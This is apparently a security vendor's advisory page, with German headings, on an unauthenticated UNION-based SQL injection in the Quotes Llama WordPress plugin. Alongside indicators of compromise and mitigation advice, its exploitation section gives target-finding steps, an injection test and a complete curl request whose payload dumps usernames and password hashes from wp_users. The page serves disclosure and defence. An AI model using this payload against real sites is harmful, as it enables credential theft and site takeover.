CVE-2026-12512
WordPress Schwachstellenanalyse und -minderung

Überblick

CVE-2026-12512 is an unauthenticated UNION-based SQL injection vulnerability in the Quotes Llama WordPress plugin affecting all versions before 3.1.6. The flaw allows unauthenticated attackers to read arbitrary data from the WordPress database, including password hashes, by exploiting an unsanitized user-supplied parameter (sc) in a SQL query. It was publicly disclosed on 2026-06-24 and assigned a CVSS score of 8.6 (High) (WPScan). The vulnerability was discovered and submitted by Pablo González Pérez, Francisco José Ramírez Vicente, and Iñigo Sánchez Enciso (WPScan). A patch was released in version 3.1.6 (GitHub Advisory).

Technische Details

The vulnerability is classified as CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) and stems from the plugin's failure to sanitize or escape the sc POST parameter before incorporating it into a SQL query (WPScan). Exploitation is performed via HTTP POST requests to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) using the action=select_search or action=select_search_page handlers. The attack requires two preconditions that represent normal plugin usage: a public page rendering a Quotes Llama shortcode (e.g., [quotes-llama mode=page]) to obtain a nonce value, and at least one quote entry in the plugin's database table. No authentication is required, making this exploitable by any anonymous visitor (WPScan).

Aufprall

Successful exploitation allows an unauthenticated attacker to extract arbitrary data from the WordPress database via UNION-based SQL injection, including all WordPress user credentials (usernames and password hashes from wp_users) and any other sensitive data stored in the database (WPScan). Compromised password hashes can be subjected to offline cracking, potentially enabling full administrative access to the WordPress site and further lateral movement. The attack is entirely network-accessible and requires no prior authentication, significantly broadening the exposure surface for any internet-facing WordPress installation running the affected plugin (GitHub Advisory).

Ausnutzungsschritte

  1. Reconnaissance: Identify WordPress sites running the Quotes Llama plugin (versions before 3.1.6) using tools like WPScan, Shodan, or by checking plugin metadata at /wp-content/plugins/quotes-llama/.
  2. Locate a shortcode page: Browse the target site to find a public page rendering the [quotes-llama mode=page] shortcode, which exposes the quotes_llama_nonce value in the HTML source.
  3. Extract the nonce: Read the nonce value from the page HTML (e.g., nonce="abc123") — this is required for the AJAX request.
  4. Verify injection (predicate test): Send a POST request to /wp-admin/admin-ajax.php with action=select_search, search_form=1, nonce=<extracted_nonce>, term=NO_SUCH_501510, and sc=quote OR 1=1#. A returned quote confirms the sc parameter is injected as raw SQL.
  5. Extract credentials (UNION attack): Send the following request to dump all WordPress user logins and password hashes:
curl -sk "https://TARGET/wp-admin/admin-ajax.php" -X POST \
  --data-urlencode "action=select_search" --data-urlencode "search_form=1" \
  --data-urlencode "nonce=<extracted_nonce>" --data-urlencode "term=NO_SUCH_501510" \
  --data-urlencode "sc=quote LIKE 0 UNION SELECT user_login,NULL,NULL,NULL,user_pass,NULL,NULL,NULL,NULL FROM wp_users#" \
  --data-urlencode "target=quotes-llama-search"
  1. Crack hashes: Use offline tools (e.g., Hashcat, John the Ripper) against the extracted WordPress password hashes ($P$B... or $wp$2y$...) to recover plaintext passwords.
  2. Achieve full access: Use recovered admin credentials to log into the WordPress dashboard and gain complete site control (WPScan).

Indikatoren für Kompromittierung

  • Network: Unusual HTTP POST requests to /wp-admin/admin-ajax.php with action=select_search or action=select_search_page parameters containing SQL keywords such as UNION, SELECT, OR 1=1, or # in the sc field.
  • Logs: WordPress or web server access logs showing repeated POST requests to admin-ajax.php from the same IP with varying sc parameter values; requests with URL-encoded SQL syntax (e.g., %20UNION%20SELECT).
  • Logs: Database query logs (if enabled) showing unexpected UNION SELECT queries against wp_users or other sensitive tables originating from the plugin's query context.
  • Behavioral: A high volume of AJAX requests to admin-ajax.php from unauthenticated sessions, particularly with search_form=1 or search_for_quote=1 parameters (WPScan).

Risikominderung und Problemumgehungen

The primary remediation is to update the Quotes Llama WordPress plugin to version 3.1.6 or later, which includes proper sanitization and escaping of the affected parameter (WPScan, GitHub Advisory). If an immediate update is not possible, consider disabling the plugin until the patch can be applied. As additional mitigations, deploy a Web Application Firewall (WAF) with rules to block SQL injection patterns in POST parameters, restrict access to wp-admin/admin-ajax.php by IP where feasible, and review database access logs for signs of prior exploitation. After patching, consider resetting WordPress user passwords as a precaution if exploitation cannot be ruled out.

Zusätzliche Ressourcen


QuelleDieser Bericht wurde mithilfe von KI erstellt

Verwandt WordPress Schwachstellen:

CVE-Kennung

Strenge

Punktzahl

Technologieen

Name der Komponente

CISA KEV-Exploit

Hat fix

Veröffentlichungsdatum

CVE-2026-12512HIGH8.6
  • quotes-llama
NeinJaJul 15, 2026
CVE-2026-12281HIGH8.1
  • shibboleth
NeinJaJul 15, 2026
CVE-2026-12997HIGH7.5
  • gravityforms
NeinJaJul 15, 2026
CVE-2026-11580MEDIUM5.5
  • kali-forms
NeinJaJul 15, 2026
CVE-2026-11579MEDIUM5.3
  • kali-forms
NeinJaJul 15, 2026

Kostenlose Schwachstellenbewertung

Benchmarking Ihrer Cloud-Sicherheitslage

Bewerten Sie Ihre Cloud-Sicherheitspraktiken in 9 Sicherheitsbereichen, um Ihr Risikoniveau zu bewerten und Lücken in Ihren Abwehrmaßnahmen zu identifizieren.

Bewertung anfordern

Eine personalisierte Demo anfordern

Sind Sie bereit, Wiz in Aktion zu sehen?

"Die beste Benutzererfahrung, die ich je gesehen habe, bietet vollständige Transparenz für Cloud-Workloads."
David EstlickCISO
"„Wiz bietet eine zentrale Oberfläche, um zu sehen, was in unseren Cloud-Umgebungen vor sich geht.“ "
Adam FletcherSicherheitsbeauftragter
"„Wir wissen, dass, wenn Wiz etwas als kritisch identifiziert, es auch wirklich kritisch ist.“"
Greg PoniatowskiLeiter Bedrohungs- und Schwachstellenmanagement